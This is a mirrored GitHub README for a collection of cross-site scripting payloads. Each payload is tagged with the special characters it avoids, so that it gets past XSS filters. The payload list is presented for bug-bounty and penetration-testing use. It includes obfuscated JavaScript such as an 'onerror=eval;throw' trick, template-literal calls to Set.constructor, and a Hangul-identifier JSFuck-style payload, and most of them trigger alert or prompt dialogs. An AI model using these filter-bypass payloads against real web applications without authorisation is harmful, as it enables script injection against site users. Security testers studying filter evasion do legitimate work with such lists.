Coder Social home page Coder Social logo

marciopocebon / xss-payload-without-anything Goto Github PK

View Code? Open in Web Editor NEW

This project forked from hahwul/xss-payload-without-anything

0.0 0.0 0.0 8 KB

XSS Payload without Anything.

Home Page: https://www.hahwul.com/2019/06/xss-payload-without-anything.html

xss-payload-without-anything's Introduction

XSS-Payload-without-Anything

XSS Payload without Anything.

What is XSS Payload without Anything

When I work for a company or bug bounty, the unexpected hurdle is a protection(xss filter) of special char in the JS(Javascript) area. So I am devising a way to easily solve these problems, and one of the processes is this document.

Let's collect a lot of thoughts and solve our problems.

Concept

It is similar to "Payload all the things" in terms of collecting the payload, but I want to provide a list of payloads with special tag (without char, used char, other..) I plan to make it easy to search and to show what characters (or what they are made of) are unusable.

format

without char: () , '

XSS Payload

// usedchar: 
// author: 
// description: 

without char (Frequently filtered characters)

I have selected special characters that are often blocked.

( ) 
{ } 
, 
"
'
`
[ ]
\ 
/ 
; 
+ 
. 
=

(template): () {} , " ' backtick [] \ / ; + . =

Usage

on Github.com

  1. Ctrl + F >
  2. find your problem char
  3. XSS

on hahwul.com comming soon

Awesome payload

coming soon

Archive

without char: () , " backtick \ / [] {} .

location='JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[2]

without char: () {} , " backtick [] / + .

onerror=eval;throw'alert\x2845\x29';

without char: !backtick

prompt`45`

without char: () {} , " backtick``[] / ; + .

location='javaScriPt:alert\x2845\x29'

without char: " backtick \ / ; .

([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+이+글+한+'(45)')()

without char: {} , " ' backtick \ / ; + =

[45].some.alert()

without char: () {} , " ' [] \ / ; + =

Set.constructor`alert\x2845\x29`

Submit XSS Payloads

Add issue form or pull Request

XSS Payload:
WithOut: 
Description: 

or ...

Tweet with me @hahwul

xss-payload-without-anything's People

Contributors

hahwul avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.